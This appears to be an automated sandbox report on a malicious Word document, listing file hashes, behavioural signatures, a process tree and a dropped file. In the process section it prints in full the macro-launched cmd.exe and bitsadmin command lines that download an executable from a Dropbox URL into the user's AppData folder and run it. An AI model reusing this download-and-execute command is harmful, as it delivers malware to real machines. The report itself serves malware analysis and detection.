Analysis
max time kernel: 101s
max time network: 16s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 11/09/2024, 19:56
Behavioral task behavioral1
Sample: db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
Resource: win7-20240729-en
Behavioral task behavioral2
Sample: db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
Resource: win10v2004-20240802-en
General
Target: db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
Size: 109KB
MD5: db1dda0772c81f143e71e55da4564d95
SHA1: 7217dd2c9da7dd0129fefaecd65a98561a3c4010
SHA256: 0d8ad63d513a9b6f03056a3134b3c258610771388215e2c5e7b08233bf2b1ad6
SHA512: ba1f07d19e025ab42187af56f04e0b7d7dcfe74d805ded5a725acb1f4b7277ed8e791704e6876b51e6aecc9b80181c89d8e363ec898c76f45eaf2818017e571d
SSDEEP: 768:p3th9csVk6tWdmUx7mOUPwAy91LSi4TSUaThfFlNGD0xz99EQ:p3pZkscv7mvPw5qi4TSlThDNGD03C
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 2748 | 1760 | cmd.exe | 29

Download via BitsAdmin (1 TTP, 1 IoC)
pid | Process
2120 | bitsadmin.exe

Drops file in Windows directory (1 IoC)
description | ioc | Process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | waitfor.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
1760 | WINWORD.EXE

Suspicious use of SetWindowsHookEx (2 IoCs)
pid | Process
1760 | WINWORD.EXE
1760 | WINWORD.EXE

Suspicious use of WriteProcessMemory (16 IoCs)
description | pid | Process | procid_target
PID 1760 wrote to memory of 2888 | 1760 | WINWORD.EXE | 30
PID 1760 wrote to memory of 2888 | 1760 | WINWORD.EXE | 30
PID 1760 wrote to memory of 2888 | 1760 | WINWORD.EXE | 30
PID 1760 wrote to memory of 2888 | 1760 | WINWORD.EXE | 30
PID 1760 wrote to memory of 2748 | 1760 | WINWORD.EXE | 31
PID 1760 wrote to memory of 2748 | 1760 | WINWORD.EXE | 31
PID 1760 wrote to memory of 2748 | 1760 | WINWORD.EXE | 31
PID 1760 wrote to memory of 2748 | 1760 | WINWORD.EXE | 31
PID 2748 wrote to memory of 2044 | 2748 | cmd.exe | 33
PID 2748 wrote to memory of 2044 | 2748 | cmd.exe | 33
PID 2748 wrote to memory of 2044 | 2748 | cmd.exe | 33
PID 2748 wrote to memory of 2044 | 2748 | cmd.exe | 33
PID 2748 wrote to memory of 2120 | 2748 | cmd.exe | 34
PID 2748 wrote to memory of 2120 | 2748 | cmd.exe | 34
PID 2748 wrote to memory of 2120 | 2748 | cmd.exe | 34
PID 2748 wrote to memory of 2120 | 2748 | cmd.exe | 34
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (depth 1, PID 1760)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\splwow64.exe (depth 2, PID 2888)
    Command line: C:\Windows\splwow64.exe 12288

  C:\Windows\SysWOW64\cmd.exe (depth 2, PID 2748)
    Command line: cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/zyqadrxqxq8ac0s/1qesyozananrivoxityof.exe?dl=1 %appdata%\dfvuau.exe &start %appdata%\dfvuau.exe"
    - Process spawned unexpected child process
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\waitfor.exe (depth 3, PID 2044)
      Command line: waitfor /t 5 YKERQ
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (depth 3, PID 2120)
      Command line: bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/zyqadrxqxq8ac0s/1qesyozananrivoxityof.exe?dl=1 C:\Users\Admin\AppData\Roaming\dfvuau.exe
      - Download via BitsAdmin
      - System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 19KB
MD5: ff99db3d22dbfb66a152889b55174b95
SHA1: 691de8b8d1fe877b6f7b75360b68076d73ee349c
SHA256: 0cb3728a9a5a982948e310ebac26319e5a8625a00f04943015a6f3359ac00337
SHA512: 80413a7fce5ee164fa0cf4873925813c776355bfad166e21fbe8ef114020fe8776f96380c0ff37888df80caceb4c10101716525744e152b1f9ccd3e5aa982072